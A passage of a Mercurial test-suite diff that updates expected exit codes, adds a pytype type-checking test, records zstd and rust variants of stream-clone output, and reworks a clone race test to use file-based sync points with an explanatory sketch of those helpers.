@@ -115,7 +115,7 @@
$ hg up
A: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ cat a
gold
$ rm a
--- a/tests/test-check-code.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-check-code.t Tue Apr 20 11:01:06 2021 -0400
@@ -11,6 +11,7 @@
> -X contrib/python-zstandard \
> -X hgext/fsmonitor/pywatchman \
> -X mercurial/thirdparty \
+ > -X mercurial/pythoncapi_compat.h \
> | sed 's-\\-/-g' | "$check_code" --warnings --per-file=0 - || false
Skipping contrib/automation/hgautomation/__init__.py it has no-che?k-code (glob)
Skipping contrib/automation/hgautomation/aws.py it has no-che?k-code (glob)
@@ -65,10 +66,10 @@
COPYING
Makefile
README.rst
- black.toml
hg
hgeditor
hgweb.cgi
+ pyproject.toml
rustfmt.toml
setup.py
--- a/tests/test-check-format.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-check-format.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,11 @@
#require black test-repo
+Black needs the real USERPROFILE in order to run on Windows
+#if msys
+ $ USERPROFILE="$REALUSERPROFILE"
+ $ export USERPROFILE
+#endif
+
$ cd $RUNTESTDIR/..
- $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'`
+ $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'`
--- a/tests/test-check-interfaces.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-check-interfaces.py Tue Apr 20 11:01:06 2021 -0400
@@ -85,6 +85,7 @@
class dummyrepo(object):
def __init__(self):
self.ui = uimod.ui()
+ self._wanted_sidedata = set()
def filtered(self, name):
pass
@@ -113,6 +114,10 @@
def close(self):
pass
+ @property
+ def closed(self):
+ pass
+
def main():
ui = uimod.ui()
@@ -243,7 +248,10 @@
# Conforms to imanifestlog.
ml = manifest.manifestlog(
- vfs, repo, manifest.manifestrevlog(repo.svfs), repo.narrowmatch()
+ vfs,
+ repo,
+ manifest.manifestrevlog(repo.nodeconstants, repo.svfs),
+ repo.narrowmatch(),
)
checkzobject(ml)
checkzobject(repo.manifestlog)
@@ -258,7 +266,7 @@
# Conforms to imanifestdict.
checkzobject(mctx.read())
- mrl = manifest.manifestrevlog(vfs)
+ mrl = manifest.manifestrevlog(repo.nodeconstants, vfs)
checkzobject(mrl)
ziverify.verifyClass(repository.irevisiondelta, revlog.revlogrevisiondelta)
@@ -272,6 +280,7 @@
flags=b'',
baserevisionsize=None,
revision=b'',
+ sidedata=b'',
delta=None,
)
checkzobject(rd)
--- a/tests/test-check-module-imports.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-check-module-imports.t Tue Apr 20 11:01:06 2021 -0400
@@ -14,6 +14,10 @@
Known-bad files are excluded by -X as some of them would produce unstable
outputs, which should be fixed later.
+NOTE: the `hg locate` command here only works on files that are known to
+Mercurial. If you add an import of a new file and haven't yet `hg add`ed it, you
+will likely receive warnings about a direct import.
+
$ testrepohg locate 'set:**.py or grep(r"^#!.*?python")' \
> 'tests/**.t' \
> -X hgweb.cgi \
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-check-pytype.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,104 @@
+#require pytype py3 slow
+
+ $ cd $RUNTESTDIR/..
+
+Many of the individual files that are excluded here confuse pytype
+because they do a mix of Python 2 and Python 3 things
+conditionally. There's no good way to help it out with that as far as
+I can tell, so let's just hide those files from it for now. We should
+endeavor to empty this list out over time, as some of these are
+probably hiding real problems.
+
+mercurial/bundlerepo.py # no vfs and ui attrs on bundlerepo
+mercurial/changegroup.py # mysterious incorrect type detection
+mercurial/chgserver.py # [attribute-error]
+mercurial/cmdutil.py # No attribute 'markcopied' on mercurial.context.filectx [attribute-error]
+mercurial/context.py # many [attribute-error]
+mercurial/copies.py # No attribute 'items' on None [attribute-error]
+mercurial/crecord.py # tons of [attribute-error], [module-attr]
+mercurial/debugcommands.py # [wrong-arg-types]
+mercurial/dispatch.py # initstdio: No attribute ... on TextIO [attribute-error]
+mercurial/exchange.py # [attribute-error]
+mercurial/hgweb/hgweb_mod.py # [attribute-error], [name-error], [wrong-arg-types]
+mercurial/hgweb/server.py # [attribute-error], [name-error], [module-attr]
+mercurial/hgweb/webcommands.py # [missing-parameter]
+mercurial/hgweb/wsgicgi.py # confused values in os.environ
+mercurial/httppeer.py # [attribute-error], [wrong-arg-types]
+mercurial/interfaces # No attribute 'capabilities' on peer [attribute-error]
+mercurial/keepalive.py # [attribute-error]
+mercurial/localrepo.py # [attribute-error]
+mercurial/lsprof.py # unguarded import
+mercurial/manifest.py # [unsupported-operands], [wrong-arg-types]
+mercurial/minirst.py # [unsupported-operands], [attribute-error]
+mercurial/patch.py # [wrong-arg-types]
+mercurial/pure/osutil.py # [invalid-typevar], [not-callable]
+mercurial/pure/parsers.py # [attribute-error]
+mercurial/pycompat.py # bytes vs str issues
+mercurial/repoview.py # [attribute-error]
+mercurial/sslutil.py # [attribute-error]
+mercurial/statprof.py # bytes vs str on TextIO.write() [wrong-arg-types]
+mercurial/testing/storage.py # tons of [attribute-error]
+mercurial/ui.py # [attribute-error], [wrong-arg-types]
+mercurial/unionrepo.py # ui, svfs, unfiltered [attribute-error]
+mercurial/upgrade.py # line 84, in upgraderepo: No attribute 'discard' on Dict[nothing, nothing] [attribute-error]
+mercurial/util.py # [attribute-error], [wrong-arg-count]
+mercurial/utils/procutil.py # [attribute-error], [module-attr], [bad-return-type]
+mercurial/utils/stringutil.py # [module-attr], [wrong-arg-count]
+mercurial/utils/memorytop.py # not 3.6 compatible
+mercurial/win32.py # [not-callable]
+mercurial/wireprotoframing.py # [unsupported-operands], [attribute-error], [import-error]
+mercurial/wireprotoserver.py # line 253, in _availableapis: No attribute '__iter__' on Callable[[Any, Any], Any] [attribute-error]
+mercurial/wireprotov1peer.py # [attribute-error]
+mercurial/wireprotov1server.py # BUG?: BundleValueError handler accesses subclass's attrs
+mercurial/wireprotov2server.py # [unsupported-operands], [attribute-error]
+
+TODO: use --no-cache on test server? Caching the files locally helps during
+development, but may be a hindrance for CI testing.
+
+ $ pytype -V 3.6 --keep-going --jobs auto mercurial \
+ > -x mercurial/bundlerepo.py \
+ > -x mercurial/changegroup.py \
+ > -x mercurial/chgserver.py \
+ > -x mercurial/cmdutil.py \
+ > -x mercurial/context.py \
+ > -x mercurial/copies.py \
+ > -x mercurial/crecord.py \
+ > -x mercurial/debugcommands.py \
+ > -x mercurial/dispatch.py \
+ > -x mercurial/exchange.py \
+ > -x mercurial/hgweb/hgweb_mod.py \
+ > -x mercurial/hgweb/server.py \
+ > -x mercurial/hgweb/webcommands.py \
+ > -x mercurial/hgweb/wsgicgi.py \
+ > -x mercurial/httppeer.py \
+ > -x mercurial/interfaces \
+ > -x mercurial/keepalive.py \
+ > -x mercurial/localrepo.py \
+ > -x mercurial/lsprof.py \
+ > -x mercurial/manifest.py \
+ > -x mercurial/minirst.py \
+ > -x mercurial/patch.py \
+ > -x mercurial/pure/osutil.py \
+ > -x mercurial/pure/parsers.py \
+ > -x mercurial/pycompat.py \
+ > -x mercurial/repoview.py \
+ > -x mercurial/sslutil.py \
+ > -x mercurial/statprof.py \
+ > -x mercurial/testing/storage.py \
+ > -x mercurial/thirdparty \
+ > -x mercurial/ui.py \
+ > -x mercurial/unionrepo.py \
+ > -x mercurial/upgrade.py \
+ > -x mercurial/utils/procutil.py \
+ > -x mercurial/utils/stringutil.py \
+ > -x mercurial/utils/memorytop.py \
+ > -x mercurial/win32.py \
+ > -x mercurial/wireprotoframing.py \
+ > -x mercurial/wireprotoserver.py \
+ > -x mercurial/wireprotov1peer.py \
+ > -x mercurial/wireprotov1server.py \
+ > -x mercurial/wireprotov2server.py \
+ > > $TESTTMP/pytype-output.txt || cat $TESTTMP/pytype-output.txt
+
+Only show the results on a failure, because the output on success is also
+voluminous and variable.
--- a/tests/test-churn.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-churn.t Tue Apr 20 11:01:06 2021 -0400
@@ -195,3 +195,22 @@
alltogether 11 *********************************************************
$ cd ..
+
+count lines that look like headings but are not
+
+ $ hg init not-headers
+ $ cd not-headers
+ $ cat > a <<EOF
+ > diff
+ > @@ -195,3 +195,21 @@
+ > -- a/tests/test-churn.t
+ > ++ b/tests/test-churn.t
+ > EOF
+ $ hg ci -Am adda -u user1
+ adding a
+ $ hg churn --diffstat
+ user1 +4/-0 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ $ hg rm a
+ $ hg ci -Am removea -u user1
+ $ hg churn --diffstat
+ user1 +4/-4 +++++++++++++++++++++++++++---------------------------
--- a/tests/test-clone-uncompressed.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-clone-uncompressed.t Tue Apr 20 11:01:06 2021 -0400
@@ -73,7 +73,6 @@
remote-changegroup
http
https
- rev-branch-cache
$ hg clone --stream -U http://localhost:$HGPORT server-disabled
warning: stream clone requested but server has them disabled
@@ -141,7 +140,6 @@
remote-changegroup
http
https
- rev-branch-cache
$ hg clone --stream -U http://localhost:$HGPORT server-disabled
warning: stream clone requested but server has them disabled
@@ -171,7 +169,7 @@
$ killdaemons.py
$ cd server
- $ hg serve -p $HGPORT -d --pid-file=hg.pid
+ $ hg serve -p $HGPORT -d --pid-file=hg.pid --error errors.txt
$ cat hg.pid > $DAEMON_PIDS
$ cd ..
@@ -180,16 +178,21 @@
#if stream-legacy
$ hg clone --stream -U http://localhost:$HGPORT clone1
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*/sec) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
+ $ cat server/errors.txt
#endif
#if stream-bundle2
$ hg clone --stream -U http://localhost:$HGPORT clone1
streaming all changes
- 1030 files to transfer, 96.5 KB of data
- transferred 96.5 KB in * seconds (* */sec) (glob)
+ 1030 files to transfer, 96.5 KB of data (no-zstd !)
+ transferred 96.5 KB in * seconds (*/sec) (glob) (no-zstd !)
+ 1030 files to transfer, 93.6 KB of data (zstd !)
+ transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !)
$ ls -1 clone1/.hg/cache
branch2-base
@@ -203,6 +206,7 @@
rbc-revs-v1
tags2
tags2-served
+ $ cat server/errors.txt
#endif
getbundle requests with stream=1 are uncompressed
@@ -213,39 +217,68 @@
$ f --size --hex --bytes 256 body
- body: size=112262
+ body: size=112262 (no-zstd !)
+ body: size=109410 (zstd no-rust !)
+ body: size=109431 (rust !)
0000: 04 6e 6f 6e 65 48 47 32 30 00 00 00 00 00 00 00 |.noneHG20.......|
- 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......|
- 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98|
- 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030|
+ 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (no-zstd !)
+ 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| (no-zstd !)
+ 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| (no-zstd !)
+ 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd no-rust !)
+ 0010: ae 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (rust !)
+ 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd no-rust !)
+ 0020: 05 09 04 0c 73 62 79 74 65 63 6f 75 6e 74 39 35 |....sbytecount95| (rust !)
+ 0030: 38 39 37 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |897filecount1030| (zstd !)
0040: 72 65 71 75 69 72 65 6d 65 6e 74 73 64 6f 74 65 |requirementsdote|
0050: 6e 63 6f 64 65 25 32 43 66 6e 63 61 63 68 65 25 |ncode%2Cfncache%|
0060: 32 43 67 65 6e 65 72 61 6c 64 65 6c 74 61 25 32 |2Cgeneraldelta%2|
- 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar|
- 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore|
- 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.|
- 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................|
- 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................|
- 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i|
- 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u|
- 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....|
- 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................|
+ 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| (no-zstd !)
+ 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| (no-zstd !)
+ 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| (no-zstd !)
+ 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| (no-zstd !)
+ 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................| (no-zstd !)
+ 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| (no-zstd !)
+ 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| (no-zstd !)
+ 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| (no-zstd !)
+ 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| (no-zstd !)
+ 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd no-rust !)
+ 0070: 43 70 65 72 73 69 73 74 65 6e 74 2d 6e 6f 64 65 |Cpersistent-node| (rust !)
+ 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd no-rust !)
+ 0080: 6d 61 70 25 32 43 72 65 76 6c 6f 67 2d 63 6f 6d |map%2Crevlog-com| (rust !)
+ 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd no-rust !)
+ 0090: 70 72 65 73 73 69 6f 6e 2d 7a 73 74 64 25 32 43 |pression-zstd%2C| (rust !)
+ 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd no-rust !)
+ 00a0: 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 73 |revlogv1%2Cspars| (rust !)
+ 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd no-rust !)
+ 00b0: 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 00 |erevlog%2Cstore.| (rust !)
+ 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd no-rust !)
+ 00c0: 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 03 |...s.Bdata/0.i..| (rust !)
+ 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd no-rust !)
+ 00d0: 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 00 |................| (rust !)
+ 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd no-rust !)
+ 00e0: 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 29 |...............)| (rust !)
+ 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd no-rust !)
+ 00f0: 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 d1 |c.I.#....Vg.g,i.| (rust !)
--uncompressed is an alias to --stream
#if stream-legacy
$ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*/sec) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
#endif
#if stream-bundle2
$ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed
streaming all changes
- 1030 files to transfer, 96.5 KB of data
- transferred 96.5 KB in * seconds (* */sec) (glob)
+ 1030 files to transfer, 96.5 KB of data (no-zstd !)
+ transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1030 files to transfer, 93.6 KB of data (zstd !)
+ transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !)
#endif
Clone with background file closing enabled
@@ -257,10 +290,12 @@
sending branchmap command
streaming all changes
sending stream_out command
- 1027 files to transfer, 96.3 KB of data
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
starting 4 threads for background file closing
updating the branch cache
- transferred 96.3 KB in * seconds (*/sec) (glob)
+ transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
query 1; heads
sending batch command
searching for changes
@@ -287,12 +322,15 @@
bundle2-input-bundle: with-transaction
bundle2-input-part: "stream2" (params: 3 mandatory) supported
applying stream bundle
- 1030 files to transfer, 96.5 KB of data
+ 1030 files to transfer, 96.5 KB of data (no-zstd !)
+ 1030 files to transfer, 93.6 KB of data (zstd !)
starting 4 threads for background file closing
starting 4 threads for background file closing
updating the branch cache
- transferred 96.5 KB in * seconds (* */sec) (glob)
- bundle2-input-part: total payload size 112094
+ transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !)
+ bundle2-input-part: total payload size 112094 (no-zstd !)
+ transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !)
+ bundle2-input-part: total payload size 109216 (zstd !)
bundle2-input-part: "listkeys" (params: 1 mandatory) supported
bundle2-input-bundle: 2 parts total
checking for updated bookmarks
@@ -324,16 +362,20 @@
#if stream-legacy
$ hg clone --stream -U http://localhost:$HGPORT secret-allowed
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*/sec) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
#endif
#if stream-bundle2
$ hg clone --stream -U http://localhost:$HGPORT secret-allowed
streaming all changes
- 1030 files to transfer, 96.5 KB of data
- transferred 96.5 KB in * seconds (* */sec) (glob)
+ 1030 files to transfer, 96.5 KB of data (no-zstd !)
+ transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1030 files to transfer, 93.6 KB of data (zstd !)
+ transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !)
#endif
$ killdaemons.py
@@ -368,7 +410,7 @@
remote: abort: server has pull-based clones disabled
abort: pull failed on remote
(remove --pull if specified or upgrade Mercurial)
- [255]
+ [100]
Local stream clone with secrets involved
(This is just a test over behavior: if you have access to the repo's files,
@@ -391,14 +433,35 @@
extension for delaying the server process so we can reliably modify the repo
while cloning
- $ cat > delayer.py <<EOF
- > import time
- > from mercurial import extensions, vfs
- > def __call__(orig, self, path, *args, **kwargs):
- > if path == 'data/f1.i':
- > time.sleep(2)
- > return orig(self, path, *args, **kwargs)
- > extensions.wrapfunction(vfs.vfs, '__call__', __call__)
+ $ cat > stream_steps.py <<EOF
+ > import os
+ > import sys
+ > from mercurial import (
+ >     encoding,
+ >     extensions,
+ >     streamclone,
+ >     testing,
+ > )
+ > WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1']
+ > WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2']
+ >
+ > def _test_sync_point_walk_1(orig, repo):
+ >     testing.write_file(WALKED_FILE_1)
+ >
+ > def _test_sync_point_walk_2(orig, repo):
+ >     assert repo._currentlock(repo._lockref) is None
+ >     testing.wait_file(WALKED_FILE_2)
+ >
+ > extensions.wrapfunction(
+ >     streamclone,
+ >     '_test_sync_point_walk_1',
+ >     _test_sync_point_walk_1
+ > )
+ > extensions.wrapfunction(
+ >     streamclone,
+ >     '_test_sync_point_walk_2',
+ >     _test_sync_point_walk_2
+ > )
> EOF
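
The extension above coordinates client and server through plain files on
disk. A minimal sketch of what file-based sync primitives in the style of
testing.write_file and testing.wait_file amount to (illustrative only; the
real helpers ship with Mercurial and may differ):

    import os
    import time

    def write_file(path):
        # creating the file is the signal; its content does not matter
        with open(path, 'wb'):
            pass

    def wait_file(path, timeout=10.0):
        # poll until the peer has created the file
        deadline = time.monotonic() + timeout
        while not os.path.exists(path):
            if time.monotonic() > deadline:
                raise RuntimeError('timed out waiting for %r' % path)
            time.sleep(0.01)
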
prepare repo with small and big file to cover both code paths in emitrevlogdata
@@ -407,20 +470,32 @@
$ touch repo/f1
$ $TESTDIR/seq.py 50000 > repo/f2
$ hg -R repo ci -Aqm "0"
- $ hg serve -R repo -p $HGPORT1 -d --pid-file=hg.pid --config extensions.delayer=delayer.py
+ $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1"
+ $ export HG_TEST_STREAM_WALKED_FILE_1
+ $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2"
+ $ export HG_TEST_STREAM_WALKED_FILE_2
+ $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3"
+ $ export HG_TEST_STREAM_WALKED_FILE_3
+# $ cat << EOF >> $HGRCPATH
+# > [hooks]
+# > pre-clone=rm -f "$TESTTMP/sync_file_walked_*"
+# > EOF
+ $ hg serve -R repo -p $HGPORT1 -d --error errors.log --pid-file=hg.pid --config extensions.stream_steps="$RUNTESTDIR/testlib/ext-stream-clone-steps.py"
$ cat hg.pid >> $DAEMON_PIDS
clone while modifying the repo between stating file with write lock and
actually serving file content
- $ hg clone -q --stream -U http://localhost:$HGPORT1 clone &
- $ sleep 1
+ $ (hg clone -q --stream -U http://localhost:$HGPORT1 clone; touch "$HG_TEST_STREAM_WALKED_FILE_3") &
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1
$ echo >> repo/f1
$ echo >> repo/f2
$ hg -R repo ci -m "1" --config ui.timeout.warn=-1
- $ wait
+ $ touch $HG_TEST_STREAM_WALKED_FILE_2
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3
$ hg -R clone id
000000000000
+ $ cat errors.log
$ cd ..
Stream repository with bookmarks
@@ -439,8 +514,10 @@
#if stream-legacy
$ hg clone --stream http://localhost:$HGPORT with-bookmarks
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -449,8 +526,10 @@
#if stream-bundle2
$ hg clone --stream http://localhost:$HGPORT with-bookmarks
streaming all changes
- 1033 files to transfer, 96.6 KB of data
- transferred 96.6 KB in * seconds (* */sec) (glob)
+ 1033 files to transfer, 96.6 KB of data (no-zstd !)
+ transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1033 files to transfer, 93.8 KB of data (zstd !)
+ transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !)
updating to branch default
1025 files updated, 0 files merged, 0 files removed, 0 files unresolved
#endif
@@ -469,8 +548,10 @@
#if stream-legacy
$ hg clone --stream http://localhost:$HGPORT phase-publish
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -479,8 +560,10 @@
#if stream-bundle2
$ hg clone --stream http://localhost:$HGPORT phase-publish
streaming all changes
- 1033 files to transfer, 96.6 KB of data
- transferred 96.6 KB in * seconds (* */sec) (glob)
+ 1033 files to transfer, 96.6 KB of data (no-zstd !)
+ transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1033 files to transfer, 93.8 KB of data (zstd !)
+ transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !)
updating to branch default
1025 files updated, 0 files merged, 0 files removed, 0 files unresolved
#endif
@@ -505,8 +588,10 @@
$ hg clone --stream http://localhost:$HGPORT phase-no-publish
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -518,8 +603,10 @@
#if stream-bundle2
$ hg clone --stream http://localhost:$HGPORT phase-no-publish
streaming all changes
- 1034 files to transfer, 96.7 KB of data
- transferred 96.7 KB in * seconds (* */sec) (glob)
+ 1034 files to transfer, 96.7 KB of data (no-zstd !)
+ transferred 96.7 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1034 files to transfer, 93.9 KB of data (zstd !)
+ transferred 93.9 KB in * seconds (* */sec) (glob) (zstd !)
updating to branch default
1025 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg -R phase-no-publish phase -r 'all()'
@@ -563,8 +650,10 @@
$ hg clone -U --stream http://localhost:$HGPORT with-obsolescence
streaming all changes
- 1035 files to transfer, 97.1 KB of data
- transferred 97.1 KB in * seconds (* */sec) (glob)
+ 1035 files to transfer, 97.1 KB of data (no-zstd !)
+ transferred 97.1 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1035 files to transfer, 94.3 KB of data (zstd !)
+ transferred 94.3 KB in * seconds (* */sec) (glob) (zstd !)
$ hg -R with-obsolescence log -T '{rev}: {phase}\n'
1: draft
0: draft
@@ -575,7 +664,7 @@
streaming all changes
remote: abort: server has obsolescence markers, but client cannot receive them via stream clone
abort: pull failed on remote
- [255]
+ [100]
$ killdaemons.py
--- a/tests/test-clonebundles.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-clonebundles.t Tue Apr 20 11:01:06 2021 -0400
@@ -279,7 +279,8 @@
$ hg -R server debugcreatestreamclonebundle packed.hg
writing 613 bytes for 4 files
- bundle requirements: generaldelta, revlogv1, sparserevlog
+ bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !)
+ bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !)
No bundle spec should work
@@ -589,9 +590,7 @@
bundle2-input-part: "listkeys" (params: 1 mandatory) supported
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
- bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
- bundle2-input-part: total payload size 59
- bundle2-input-bundle: 4 parts total
+ bundle2-input-bundle: 3 parts total
checking for updated bookmarks
updating the branch cache
added 2 changesets with 2 changes to 2 files
--- a/tests/test-commandserver.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-commandserver.t Tue Apr 20 11:01:06 2021 -0400
@@ -522,7 +522,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
*** runcommand verify
checking changesets
checking manifests
@@ -1013,7 +1013,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
*** runcommand log
*** runcommand verify -q
@@ -1057,7 +1057,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
*** runcommand log
0 bar (bar)
*** runcommand verify -q
--- a/tests/test-commit-amend.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-commit-amend.t Tue Apr 20 11:01:06 2021 -0400
@@ -209,7 +209,7 @@
transaction abort!
rollback completed
abort: pretxncommit.test-saving-last-message hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
message given from command line (no-eol)
@@ -234,7 +234,7 @@
transaction abort!
rollback completed
abort: pretxncommit.test-saving-last-message hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
another precious commit message
--- a/tests/test-completion.t Thu Mar 25 19:06:28 2021 -0400
